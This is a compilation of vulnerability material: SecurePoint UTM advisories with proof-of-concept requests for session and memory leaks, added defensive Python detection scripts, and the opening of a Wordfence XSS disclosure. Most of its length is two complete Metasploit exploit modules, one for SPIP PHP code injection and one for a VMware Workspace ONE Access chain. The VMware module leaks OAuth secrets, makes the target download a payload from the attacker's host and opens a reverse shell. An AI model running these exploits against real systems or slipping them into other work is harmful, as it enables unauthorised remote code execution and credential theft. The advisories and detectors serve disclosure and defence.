<pre><code>RCE Security Advisory<br />https://www.rcesecurity.com<br /><br /><br />1. ADVISORY INFORMATION<br />=======================<br />Product: SecurePoint UTM<br />Vendor URL: https://www.securepoint.de/en/for-companies/firewall-vpn<br />Type: Use of Uninitialized Variable [CWE-457]<br />Date found: 2023-01-05<br />Date published: 2023-04-12<br />CVSSv3 Score: 6.5 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)<br />CVE: CVE-2023-22897<br /><br /><br />2. CREDITS<br />==========<br />This vulnerability was discovered and researched by Julien Ahrens from<br />RCE Security.<br /><br /><br />3. VERSIONS AFFECTED<br />====================<br />SecurePoint UTM 12.2.5<br />SecurePoint UTM 12.2.4.1<br />SecurePoint UTM 12.2.4<br />SecurePoint UTM 12.2.3.4<br />SecurePoint UTM 12.2.3.3<br />SecurePoint UTM 12.2.3.2 Reseller Preview<br />SecurePoint UTM 12.2.3.1 Reseller Preview<br /><br /><br />4. INTRODUCTION<br />===============<br />With secure networks, home office, site connectivity and the protection of your<br />data are easy to implement. UTM firewalls and VPN gateways from Securepoint secure<br />your networks - with suitable IT security solutions for small and medium-sized<br />businesses for rent, purchase or as a complete service.<br /><br />(from the vendor's homepage)<br /><br /><br />5. VULNERABILITY DETAILS<br />========================<br />The firewall offers an administrative web panel on port 11115 and a user login<br />panel on port 443. Both use the endpoint at "/spcgi.cgi" to perform authentication<br />checks via the "login" command. Once authentication is successful (a low-privileged<br />user account is sufficient) and the returned "sessionid" has never been used in<br />any subsequent request, the application returns remote memory contents within the<br />sessionid JSON attribute of its reply to every subsequent request that does not<br />contain the sessionid (which is why that sessionid is referred to as "unused").<br />The leaked memory contents include memory addresses as well as environment<br />variables.<br /><br />This happens because the application doesn't correctly initialize a variable that is<br />later used in the JSON output referencing the sessionid.<br /><br />Successful exploits can allow an authenticated attacker to leak memory contents,<br />which might contain sensitive information, and help defeat memory protections such<br />as ASLR.<br /><br /><br />6. PROOF OF CONCEPT<br />===================<br />First, authenticate using any legitimate user against either the admin panel on port<br />11115 or the user panel on port 443 by using a single HTTP POST request like the<br />following:<br /><br />POST /spcgi.cgi HTTP/1.1<br />Host: 192.168.175.1<br />Content-Length: 100<br />Accept: */*<br />Content-Type: application/json; charset=UTF-8<br />User-Agent: Mozilla/5.0<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-GB,en-US;q=0.9,en;q=0.8<br />Connection: close<br /><br />{"module":"auth","command":["login"],"sessionid":"","arguments":{"user":"user","pass":"Password"}}<br /><br />This returns a sessionid, which you must not use in any subsequent request. This is<br />important because the exploit won't work if you authenticate through the web<br />interface: the web application immediately "uses" the sessionid in the further<br />requests it issues.<br /><br />Then submit any JSON request without a sessionid against the same endpoint, such as:<br /><br />POST /spcgi.cgi HTTP/1.1<br />Host: 192.168.175.1<br />Content-Length: 2<br />Accept: */*<br />Content-Type: application/json; charset=UTF-8<br />User-Agent: test<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-GB,en-US;q=0.9,en;q=0.8<br />Connection: close<br /><br />{}<br /><br />The reply to that request then carries the remote memory contents within the<br />sessionid JSON attribute.<br /><br /><br />7. SOLUTION<br />===========<br />Upgrade to version 12.2.5.1 or newer<br /><br /><br />8. REPORT TIMELINE<br />==================<br />2023-01-04: Discovery of the vulnerability<br />2023-01-06: Contacted vendor via a known contact<br />2023-01-06: Vendor response<br />2023-01-06: Sent full vulnerability details to vendor<br />2023-01-06: Vendor acknowledged the vulnerability<br />2023-01-06: Vendor asks to set the disclosure date to 2023-04-11 due to the # of affected customers<br />2023-01-06: RCE Security agrees to the proposed disclosure date<br />2023-01-06: Vendor publishes hotfix 12.2.5.1 which fixes the vulnerability<br />2023-01-10: MITRE assigns CVE-2023-22897<br />2023-04-12: Public disclosure<br /><br /><br />9. REFERENCES<br />==============<br />https://www.rcesecurity.com/2023/04/securepwn-part-2-leaking-remote-memory-contents-cve-2023-22897/<br />https://github.com/MrTuxracer/advisories<br /></code></pre>
<pre><code>RCE Security Advisory<br />https://www.rcesecurity.com<br /><br /><br />1. ADVISORY INFORMATION<br />=======================<br />Product: SecurePoint UTM<br />Vendor URL: https://www.securepoint.de/en/for-companies/firewall-vpn<br />Type: Exposure of Sensitive Information to an Unauthorized Actor [CWE-200]<br />Date found: 2023-01-05<br />Date published: 2023-04-11<br />CVSSv3 Score: 9.0 (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)<br />CVE: CVE-2023-22620<br /><br /><br />2. CREDITS<br />==========<br />This vulnerability was discovered and researched by Julien Ahrens from<br />RCE Security.<br /><br /><br />3. VERSIONS AFFECTED<br />====================<br />SecurePoint UTM 12.2.5<br />SecurePoint UTM 12.2.4.1<br />SecurePoint UTM 12.2.4<br />SecurePoint UTM 12.2.3.4<br />SecurePoint UTM 12.2.3.3<br />SecurePoint UTM 12.2.3.2 Reseller Preview<br />SecurePoint UTM 12.2.3.1 Reseller Preview<br /><br /><br />4. INTRODUCTION<br />===============<br />With secure networks, home office, site connectivity and the protection of your<br />data are easy to implement. UTM firewalls and VPN gateways from Securepoint secure<br />your networks - with suitable IT security solutions for small and medium-sized<br />businesses for rent, purchase or as a complete service.<br /><br />(from the vendor's homepage)<br /><br /><br />5. VULNERABILITY DETAILS<br />========================<br />The firewall offers an administrative web panel on port 11115 and a user login panel<br />on port 443. Both offer the endpoint at "/spcgi.cgi", which leaks the "sessionid" of<br />the last active authenticated user to any unauthenticated user when the application<br />processes an invalid authentication attempt.<br /><br />However, the attacker needs two more authentication attributes to be able to successfully<br />authenticate using the leaked sessionid:<br /><br />1. The attacker must have the same REMOTE_ADDR as the user whose sessionid is leaked.<br />This isn't trivial to achieve, but exploitation is easy in configurations where either of<br />the two panels is NAT'ed.<br /><br />2. The attacker needs to know the User-Agent of the user whose sessionid is leaked.<br />However, since the application does not enforce a rate limit on the authentication<br />endpoint, it is trivially easy to brute-force the User-Agent belonging to the leaked<br />session and then authenticate to the device. As the linked blog post describes, the<br />number of possible User-Agents can be further reduced.<br /><br />Interestingly, this exploit works across both authentication panels, so an attacker<br />can also leak the sessionid of an administrator using the user login interface and vice<br />versa.<br /><br />Successful exploits can allow an unauthenticated attacker to authenticate against<br />the administrative interface without knowing the user's password. If the last<br />authenticated user has administrative privileges, this means a complete compromise<br />of the device, since it is trivially easy to escalate from admin to root using legitimate<br />features.<br /><br /><br />6. PROOF OF CONCEPT<br />===================<br />Wait until a user successfully authenticates against the device and then issue an<br />invalid authentication attempt like:<br /><br />POST /spcgi.cgi HTTP/1.1<br />Host: 192.168.175.1:11115<br />Content-Length: 86<br />Accept: */*<br />Content-Type: application/json; charset=UTF-8<br />Connection: close<br /><br />{"module":"auth","command":["login"],"sessionid":"","arguments":{"user":"","pass":""}}<br /><br />The application then returns the last active user's sessionid:<br /><br />{<br /> "sessionid": "8d4602543120a48a4ec30762c5cad3fa",<br /> "mode": "w",<br /> "result": {<br /> "module": "server",<br /> "code": 401,<br /> "status": "Unauthorized",<br /> "message": "failure: access denied"<br /> },<br /> "version": "11.6"<br />}<br /><br />This is also exploitable against the user interface on port 443.<br /><br /><br />7. SOLUTION<br />===========<br />Upgrade to version 12.2.5.1 or newer<br /><br /><br />8. REPORT TIMELINE<br />==================<br />2023-01-04: Discovery of the vulnerability<br />2023-01-04: MITRE assigns CVE-2023-22620<br />2023-01-05: Contacted vendor via their security@<br />2023-01-05: Vendor response<br />2023-01-05: Sent full vulnerability details to vendor<br />2023-01-06: Vendor acknowledged the vulnerability<br />2023-01-06: Vendor asks to set the disclosure date to 2023-04-11 due to the # of affected customers<br />2023-01-06: RCE Security agrees to the proposed disclosure date<br />2023-01-06: Vendor publishes hotfix 12.2.5.1 which fixes the vulnerability<br />2023-04-11: Public disclosure<br /><br /><br />9. REFERENCES<br />==============<br />https://www.rcesecurity.com/2023/04/securepwn-part-1-bypassing-securepoint-utms-authentication-cve-2023-22620/<br />https://github.com/MrTuxracer/advisories<br /><br /></code></pre>
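<p>The two SecurePoint advisories above concern the same "/spcgi.cgi" endpoint, so one added triage script serves both (example code, not SecurePoint's and not the advisory author's): it checks captured JSON replies for a sessionid handed out on a failed login (CVE-2023-22620), for a sessionid that is not a 32-hex token and so may hold memory contents (CVE-2023-22897), and for one source address rotating through User-Agents on failed logins, the brute force the second advisory describes. The record layout, the threshold and the sample traffic are constructed assumptions.</p>

```python
import json
import re
from collections import defaultdict

# A healthy SecurePoint sessionid, as in the advisory's sample reply, is 32 lower-case hex chars.
SESSIONID_RE = re.compile(r"^[0-9a-f]{32}$")
# Distinct User-Agents on failed logins from one source before we call it a brute force
# (constructed threshold; tune it to the real client population behind a NAT).
UA_BRUTE_THRESHOLD = 5


def parse_reply(body: str):
    """Return the reply as a dict, or None when it is not a JSON object."""
    try:
        doc = json.loads(body)
    except json.JSONDecodeError:
        return None
    return doc if isinstance(doc, dict) else None


def check_reply(body: str) -> list:
    """Indicator strings for one /spcgi.cgi JSON reply; an empty list means it looks clean."""
    doc = parse_reply(body)
    if doc is None:
        # Raw memory in the sessionid field can break the JSON framing itself.
        return ["reply is not a JSON object (possible CVE-2023-22897 memory leak)"]
    sid = doc.get("sessionid")
    if not isinstance(sid, str) or sid == "":
        return []
    findings = []
    if not SESSIONID_RE.match(sid):
        findings.append("sessionid is not a 32-hex token (possible CVE-2023-22897 memory leak)")
    result = doc.get("result")
    if isinstance(result, dict) and result.get("code") == 401:
        findings.append("failed login reply carries a sessionid (CVE-2023-22620 session leak)")
    return findings


def triage(records: list) -> list:
    """Per-reply checks plus the per-source User-Agent rotation check; returns alert strings."""
    alerts = []
    failed_uas = defaultdict(set)  # source address -> User-Agents seen on failed logins
    for rec in records:
        alerts.extend(f"{rec['src']}: {f}" for f in check_reply(rec["body"]))
        doc = parse_reply(rec["body"]) or {}
        result = doc.get("result")
        if isinstance(result, dict) and result.get("code") == 401:
            failed_uas[rec["src"]].add(rec["ua"])
    for src, uas in sorted(failed_uas.items()):
        if len(uas) >= UA_BRUTE_THRESHOLD:
            alerts.append(f"{src}: {len(uas)} distinct User-Agents on failed logins "
                          "(User-Agent brute force against a leaked sessionid, CVE-2023-22620)")
    return alerts


def sample_reply(sessionid: str, code: int, status: str) -> str:
    """A reply in the shape the advisory shows (constructed sample data)."""
    return json.dumps({
        "sessionid": sessionid,
        "mode": "w",
        "result": {"module": "server", "code": code, "status": status},
        "version": "11.6",
    })


# Constructed traffic: one legitimate login, the empty-credential probe that receives the
# victim's sessionid, a reply whose sessionid holds memory contents, and six failed logins
# from the probing host with a different User-Agent each time.
SAMPLE_RECORDS = [
    {"src": "192.168.175.20", "ua": "Mozilla/5.0",
     "body": sample_reply("8d4602543120a48a4ec30762c5cad3fa", 200, "OK")},
    {"src": "192.168.175.99", "ua": "curl/7.88",
     "body": sample_reply("8d4602543120a48a4ec30762c5cad3fa", 401, "Unauthorized")},
    {"src": "192.168.175.21", "ua": "Mozilla/5.0",
     "body": sample_reply("0x7ffd3a2c1e40 PATH=/usr/bin HOME=/", 400, "Bad Request")},
] + [
    {"src": "192.168.175.99", "ua": f"Probe/{i}",
     "body": sample_reply("", 401, "Unauthorized")}
    for i in range(6)
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_RECORDS):
        print(alert)
```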
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::CmdStager<br /> include Msf::Exploit::Remote::HttpClient<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'SPIP form PHP Injection',<br /> 'Description' => %q{<br /> This module exploits a PHP code injection in SPIP. The vulnerability exists in the<br /> oubli parameter and allows an unauthenticated user to execute arbitrary commands<br /> with web user privileges. Branches 3.2, 4.0, 4.1 and 4.2 are concerned. Vulnerable versions<br /> are <3.2.18, <4.0.10, <4.1.18 and <4.2.1.<br /> },<br /> 'Author' => [<br /> 'coiffeur', # Initial discovery<br /> 'Laluka', # PoC<br /> 'Julien Voisin' # MSF module<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'References' => [<br /> [ 'URL', 'https://blog.spip.net/Mise-a-jour-critique-de-securite-sortie-de-SPIP-4-2-1-SPIP-4-1-8-SPIP-4-0-10-et.html' ],<br /> [ 'URL', 'https://therealcoiffeur.com/c11010' ],<br /> [ 'CVE', '2023-27372' ],<br /> ],<br /> 'Privileged' => false,<br /> 'Platform' => %w[php linux unix],<br /> 'Arch' => [ARCH_PHP, ARCH_CMD],<br /> 'Targets' => [<br /> [<br /> 'Automatic (PHP In-Memory)',<br /> {<br /> 'Platform' => 'php',<br /> 'Arch' => ARCH_PHP,<br /> 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' },<br /> 'Type' => :php_memory,<br /> 'Payload' => {<br /> 'BadChars' => "\x22\x00"<br /> }<br /> }<br /> ],<br /> [<br /> 'Automatic (Unix In-Memory)',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' },<br /> 'Type' => :unix_memory,<br /> 'Payload' => {<br /> 'BadChars' => "\x22\x00\x27"<br /> }<br /> }<br /> ],<br /> ],<br /> 'Notes' => {<br /> 
'Stability' => [ CRASH_SAFE ],<br /> 'Reliability' => [ REPEATABLE_SESSION ],<br /> 'SideEffects' => [IOC_IN_LOGS]<br /> },<br /> 'DefaultTarget' => 0,<br /> 'DisclosureDate' => '2023-02-27'<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> OptString.new('TARGETURI', [true, 'The base path to SPIP application', '/']),<br /> ]<br /> )<br /> end<br /><br /> def check<br /> uri = normalize_uri(target_uri.path, 'spip.php')<br /> res = send_request_cgi({ 'uri' => uri.to_s })<br /><br /> return Exploit::CheckCode::Unknown('Target is unreachable.') unless res<br /> return Exploit::CheckCode::Unknown("Target responded with unexpected HTTP response code: #{res.code}") unless res.code == 200<br /><br /> version_string = res.get_html_document.at('head/meta[@name="generator"]/@content')&.text<br /><br /> # Prefer the generator meta tag; fall back to the Composed-By header when the tag is absent<br /> version = nil<br /> if version_string =~ /SPIP (.*)/<br /> version = ::Regexp.last_match(1)<br /> elsif res.headers['Composed-By'] =~ /SPIP (.*) @/<br /> version = ::Regexp.last_match(1)<br /> end<br /><br /> return Exploit::CheckCode::Unknown('Unable to determine the version of SPIP') unless version<br /><br /> print_status("SPIP Version detected: #{version}")<br /><br /> rversion = Rex::Version.new(version)<br /> if rversion >= Rex::Version.new('4.2.0')<br /> if rversion < Rex::Version.new('4.2.1')<br /> return Exploit::CheckCode::Appears<br /> end<br /> elsif rversion >= Rex::Version.new('4.1.0')<br /> if rversion < Rex::Version.new('4.1.18')<br /> return Exploit::CheckCode::Appears<br /> end<br /> elsif rversion >= Rex::Version.new('4.0.0')<br /> if rversion < Rex::Version.new('4.0.10')<br /> return Exploit::CheckCode::Appears<br /> end<br /> elsif rversion >= Rex::Version.new('3.2.0')<br /> if rversion < Rex::Version.new('3.2.18')<br /> return Exploit::CheckCode::Appears<br /> end<br /> end<br /><br /> return Exploit::CheckCode::Safe<br /> end<br /><br /> def execute_command(cmd, args = {})<br /> send_request_cgi(<br /> {<br /> 'uri' => args['uri'],<br /> 'method' => 'POST',<br /> 'vars_post' => {<br /> 'page' => 'spip_pass',<br /> 'lang' => 'fr',<br /> 'formulaire_action' => 'oubli',<br /> 'formulaire_action_args' => args['csrf'],<br /> 'oubli' => cmd<br /> }<br /> }<br /> )<br /> end<br /><br /> def exploit<br /> uri = normalize_uri(target_uri.path, 'spip.php?page=spip_pass&lang=fr')<br /> res = send_request_cgi({ 'uri' => uri })<br /><br /> fail_with(Msf::Exploit::Failure::Unreachable, "The request to uri: #{uri} did not respond") unless res<br /> fail_with(Msf::Exploit::Failure::UnexpectedReply, "Got an http code that isn't 200: #{res.code}, when sending a request to uri: #{uri}") unless res&.code == 200<br /><br /> csrf = ''<br /> unless (node = res.get_html_document.xpath('//form//input[@name="formulaire_action_args"]')).empty?<br /> csrf = node.first['value']<br /> end<br /><br /> print_status("Got anti-csrf token: #{csrf}")<br /><br /> 
print_status("#{rhost}:#{rport} - Attempting to exploit...")<br /><br /> oubli = ''<br /> case target['Type']<br /> when :php_memory<br /> oubli = "s:#{payload.encoded.length + 6 + 2}:\"<?php #{payload.encoded}?>\";"<br /> when :unix_memory<br /> oubli = "s:#{payload.encoded.length + 14 + 4}:\"<?php system('#{payload.encoded}')?>\";"<br /> end<br /> execute_command(oubli, { 'uri' => uri, 'csrf' => csrf })<br /> end<br />end<br /></code></pre>
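<p>The module above sends the <code>oubli</code> field of the spip_pass form as a PHP serialized string whose declared length is computed by hand (the +6+2 and +14+4 in the exploit). As an added, defender-side example (not SPIP's code and not the module's), the following check parses that serialized-string shape, verifies the declared length the way unserialize() would, and rejects anything that is not the e-mail address or login the form legitimately expects; the regexes and the e-mail/login allowlist are assumptions.</p>

```python
import re

# PHP serialized string: s:<byte length>:"<bytes>";  This is the exact shape the module's
# 'oubli' value takes, because PHP's unserialize() rejects a declared length that does
# not match the content.
SERIALIZED_STR_RE = re.compile(r'^s:(\d+):"(.*)";$', re.DOTALL)
PHP_OPEN_TAG_RE = re.compile(r"<\?(php|=)", re.IGNORECASE)
# What the forgotten-password form legitimately receives (assumption: an e-mail address
# or a short login name; adapt to the site's real rules).
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")
LOGIN_RE = re.compile(r"^[\w.-]{1,64}$")


def parse_php_serialized_string(value: str):
    """Return the payload of a well-formed PHP serialized string, or None if it is not one."""
    match = SERIALIZED_STR_RE.match(value)
    if not match:
        return None
    declared, content = int(match.group(1)), match.group(2)
    if declared != len(content.encode("utf-8")):
        return None  # length mismatch: PHP's unserialize() would reject it as well
    return content


def inspect_oubli(value: str) -> str:
    """Classify one 'oubli' form value before it reaches the application."""
    inner = parse_php_serialized_string(value)
    if inner is not None:
        return "reject:serialized-php" if PHP_OPEN_TAG_RE.search(inner) else "reject:serialized"
    if PHP_OPEN_TAG_RE.search(value):
        return "reject:php-tag"
    if EMAIL_RE.match(value) or LOGIN_RE.match(value):
        return "ok"
    return "reject:format"


def audit_form_post(fields: dict) -> str:
    """Verdict for a whole spip_pass form post; only the 'oubli' action carries this field."""
    if fields.get("formulaire_action") != "oubli":
        return "ok"
    return inspect_oubli(fields.get("oubli", ""))


if __name__ == "__main__":
    # Constructed samples: a normal request and one in the serialized shape the module builds.
    for sample in ["alice@example.org", 's:15:"<?php echo 1;?>";']:
        print(repr(sample), "->", inspect_oubli(sample))
```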
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /><br /> Rank = ExcellentRanking<br /><br /> include Exploit::EXE<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::Remote::HttpServer<br /> include Msf::Exploit::CmdStager<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> class InvalidRequest < StandardError<br /> end<br /><br /> class InvalidResponse < StandardError<br /> end<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'VMware Workspace ONE Access VMSA-2022-0011 exploit chain',<br /> 'Description' => %q{<br /> This module combines two vulnerabilities in order to achieve remote code execution in the context of the<br /> `horizon` user. The first vulnerability, CVE-2022-22956, is an authentication bypass in<br /> OAuth2TokenResourceController ACS which allows a remote, unauthenticated attacker to bypass the<br /> authentication mechanism and execute any operation. 
The second vulnerability, CVE-2022-22957, is a JDBC<br /> injection in the dbCheck method of the DBConnectionCheckController class, which allows an attacker<br /> to deserialize arbitrary Java objects and thereby achieve remote code execution.<br /> },<br /> 'Author' => [<br /> 'mr_me', # Discovery & PoC<br /> 'jheysel-r7' # Metasploit Module<br /> ],<br /> 'References' => [<br /> ['CVE', '2022-22956'],<br /> ['CVE', '2022-22957'],<br /> ['URL', 'https://srcincite.io/blog/2022/08/11/i-am-whoever-i-say-i-am-infiltrating-vmware-workspace-one-access-using-a-0-click-exploit.html#dbconnectioncheckcontroller-dbcheck-jdbc-injection-remote-code-execution'],<br /> ['URL', 'https://github.com/sourceincite/hekate/'],<br /> ['URL', 'https://www.vmware.com/security/advisories/VMSA-2022-0011.html']<br /> ],<br /> 'DisclosureDate' => '2022-04-06',<br /> 'License' => MSF_LICENSE,<br /> 'Platform' => ['unix', 'linux'],<br /> 'Arch' => [ARCH_CMD, ARCH_X64],<br /> 'Privileged' => false,<br /> 'Targets' => [<br /> [<br /> 'Unix Command',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_cmd,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp'<br /> }<br /> }<br /> ],<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_X64],<br /> 'Type' => :linux_dropper,<br /> 'CmdStagerFlavor' => %i[curl wget],<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'<br /> }<br /> }<br /> ]<br /> ],<br /> 'Payload' => {<br /> 'BadChars' => "\x22"<br /> },<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'RPORT' => 443,<br /> 'SSL' => true,<br /> 'LPORT' => 5555<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /> end<br /><br /> # The VMware products affected do not expose any version information to unauthenticated users.<br /> # Attempt to exploit the auth bypass to determine if the target is vulnerable. Both the auth bypass and RCE were<br /> # patched in the following VMware update: https://kb.vmware.com/s/article/88099<br /> def check<br /> @token = get_authentication_token<br /> Exploit::CheckCode::Vulnerable('Successfully bypassed authentication by exploiting CVE-2022-22956')<br /> rescue InvalidRequest, InvalidResponse => e<br /> return Exploit::CheckCode::Safe("There was an error exploiting the authentication bypass vulnerability (CVE-2022-22956): #{e.class}, #{e}")<br /> end<br /><br /> # Exploit OAuth2TokenResourceController ACS Authentication Bypass (CVE-2022-22956).<br /> #<br /> # Return the authentication token<br /> def get_authentication_token<br /> oauth_client = ['Service__OAuth2Client', 'acs'].sample<br /> res_activation_token = send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path, 'SAAS', 'API', '1.0', 'REST', 'oauth2', 'generateActivationToken', oauth_client),<br /> 'method' => 'POST'<br /> })<br /><br /> unless res_activation_token<br /> raise InvalidRequest, 'No response from the server when requesting an activation token'<br /> end<br /><br /> unless res_activation_token.code == 200 && res_activation_token.headers['content-type'] == 'application/json;charset=UTF-8'<br /> raise InvalidResponse, "Unexpected response code:#{res_activation_token.code}, when requesting an activation token"<br /> end<br /><br /> activation_token = res_activation_token.get_json_document['activationToken']<br /><br /> res_client_info = send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path, 'SAAS', 'API', '1.0', 'REST', 'oauth2', 'activate'),<br /> 'method' => 'POST',<br /> 'Content-Type' => 'application/x-www-form-urlencoded',<br /> 'data' => activation_token<br /> })<br /><br /> unless res_client_info<br /> raise InvalidRequest, 'No response from the server when sending the activation token and expecting client info in return'<br /> end<br 
/><br /> unless res_client_info.code == 200 && res_client_info.headers['content-type'] == 'application/json;charset=UTF-8'<br /> raise InvalidResponse, "Unexpected response code:#{res_client_info.code}, when sending the activation token and expecting client info in return"<br /> end<br /><br /> json_client_info = res_client_info.get_json_document<br /> client_id = json_client_info['client_id']<br /> client_secret = json_client_info['client_secret']<br /><br /> print_good("Leaked client_id: #{client_id}")<br /> print_good("Leaked client_secret: #{client_secret}")<br /> post_data = "grant_type=client_credentials&client_id=#{client_id}&client_secret=#{client_secret}"<br /><br /> res_access_token = send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path, 'SAAS', 'auth', 'oauthtoken'),<br /> 'method' => 'POST',<br /> 'Content-Type' => 'application/x-www-form-urlencoded',<br /> 'data' => post_data<br /> })<br /><br /> unless res_access_token<br /> raise InvalidRequest, 'No response from the server when requesting the access token'<br /> end<br /><br /> unless res_access_token.code == 200 && res_access_token.headers['content-type'] == 'application/json;charset=UTF-8' && res_access_token.get_json_document['access_token']<br /> raise InvalidResponse, 'Invalid response from the server when requesting the access token'<br /> end<br /><br /> res_access_token.get_json_document['access_token']<br /> end<br /><br /> # Serve the files for the target machine to download.<br /> # If the request to the server ends in .xml the victim is requesting the spring bean generated by the generate_payload_xml method.<br /> # If the request doesn't end in .xml the victim is requesting the linux dropper payload.<br /> def on_request_uri(cli, request)<br /> vprint_status("on_request_uri - Request '#{request.method} #{request.uri}'")<br /> if request.to_s.include?('.xml')<br /> vprint_status('Sending XML response: ')<br /> send_response(cli, @payload_xml, { 'Content-Type' => 'application/octet-stream' })<br /> vprint_status('Response sent')<br /> else<br /> vprint_status('Sending PAYLOAD: ')<br /> send_response(cli, generate_payload_exe(code: payload.encoded), { 'Content-Type' => 'application/octet-stream' })<br /> end<br /> end<br /><br /> # Generates the malicious spring bean that will be hosted by the metasploit http server and downloaded and run by the victim<br /> #<br /> # Returns an XML document containing the payload.<br /> def generate_payload_xml(cmd)<br /> bean = ''<br /> builder = ::Builder::XmlMarkup.new(target: bean, indent: 2)<br /> builder.beans(xmlns: 'http://www.springframework.org/schema/beans', 'xmlns:xsi': 'http://www.w3.org/2001/XMLSchema-instance', 'xsi:schemaLocation': 'http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd') do<br /> builder.bean(id: 'pb', class: 'java.lang.ProcessBuilder', 'init-method': 'start') do<br /> builder.constructor do<br /> builder.list do<br /> builder.value('/bin/sh')<br /> builder.value('-c')<br /> builder.value(cmd)<br /> end<br /> end<br /> end<br /> end<br /><br /> bean.gsub!('constructor', 'constructor-arg')<br /> vprint_status(bean)<br /> bean<br /> end<br /><br /> # Calls the vulnerable dbCheck method in order to download and run the payload the module is hosting.<br /> def trigger_jdbc_rce(jwt, sub_cmd)<br /> # jdbc_uri = "jdbc:postgresql://localhost:1337/saas?socketFactory=org.springframework.context.support.FileSystemXmlApplicationContext&socketFactoryArg=http://#{datastore['LHOST']}:#{datastore['SRVPORT']}/#(unknown)"<br /> jdbc_uri = "jdbcUrl=jdbc%3Apostgresql%3A%2F%2Flocalhost%3A1337%2Fsaas%3FsocketFactory%3Dorg.springframework.context.support.FileSystemXmlApplicationContext%26socketFactoryArg%3Dhttp%3A%2F%2F#{datastore['LHOST']}%3A#{datastore['SRVPORT']}%2F#{@payload_name}&dbUsername=&dbPassword"<br /> res = send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path, 'SAAS', 'API', '1.0', 'REST', 'system', 'dbCheck'),<br /> 'method' => 'POST',<br 
/> 'Content-Type' => 'application/x-www-form-urlencoded',<br /> 'Connection' => 'keep-alive',<br /> 'cookie' => "HZN=#{jwt}",<br /> 'data' => jdbc_uri<br /> })<br /><br /> fail_with(Failure::Unreachable, "No response from the request to trigger the following sub command: #{sub_cmd}") unless res<br /> fail_with(Failure::UnexpectedReply, "Unexpected response from the request to trigger the following sub command: #{sub_cmd}") unless res.code == 406 && res.body == '{"success":false,"status":406,"message":"database.connection.notSuccess","code":406}'<br /> end<br /><br /> def execute_command(cmd, opts = {})<br /> vprint_status("Executing the following command: #{cmd}")<br /> @payload_xml = generate_payload_xml(cmd)<br /> trigger_jdbc_rce(opts[:jwt], cmd)<br /> end<br /><br /> # Instruct the user to exploit CVE-2022-22960<br /> def on_new_session(_client)<br /> print_good('Now background this session with "bg" and then run "resource run_cve-2022-22960_lpe.rc" to get a root shell')<br /> end<br /><br /> def exploit<br /> unless @token<br /> begin<br /> @token = get_authentication_token<br /> rescue InvalidRequest => e<br /> fail_with(Failure::Unreachable, "There was an error exploiting the authentication by-pass vulnerability (CVE-2022-22956): #{e.class}, #{e}")<br /> rescue InvalidResponse => e<br /> fail_with(Failure::UnexpectedReply, "There was an error exploiting the authentication by-pass vulnerability (CVE-2022-22956): #{e.class}, #{e}")<br /> end<br /> end<br /><br /> @payload_name = Rex::Text.rand_text_alpha(4..12) + '.xml'<br /> start_service('Path' => "/#{@payload_name}")<br /><br /> case target['Type']<br /> when :unix_cmd<br /> execute_command(payload.encoded, { jwt: @token })<br /> when :linux_dropper<br /> execute_cmdstager({ jwt: @token })<br /> else<br /> fail_with(Failure::BadConfig, 'Invalid target specified')<br /> end<br /> end<br />end<br /></code></pre>
<pre><code>On March 14, 2023, the Wordfence Threat Intelligence team initiated the responsible disclosure process for two nearly identical Cross-Site Scripting vulnerabilities in the Weaver Xtreme theme and the Weaver Show Posts plugin, which each have over 10,000 installations. The plugin developer responded the same day and we provided full disclosure.<br /><br />Wordfence Premium, Care, and Response users received a firewall rule to protect against any exploits targeting this vulnerability on March 14, 2023. Sites still using the free version of Wordfence received the same protection on April 13, 2023.<br /><br />A patched version of the Weaver Show Posts plugin, 1.7, was released on April 1, 2023, while the patched version 6.2 of the Weaver Xtreme theme became available on April 5, 2023.<br /><br />This email content has also been published on our blog and you're welcome to post a comment there if you'd like to join the conversation. Or you can read the full post in this email.<br /><br />Vulnerability Summary From Wordfence Intelligence<br /><br />Description: Weaver Xtreme Theme <= 5.0.7 - Authenticated(Contributor+) Stored Cross-Site Scripting via Display Name<br /><br />Affected Theme: Weaver Xtreme<br /><br />Theme Slug: 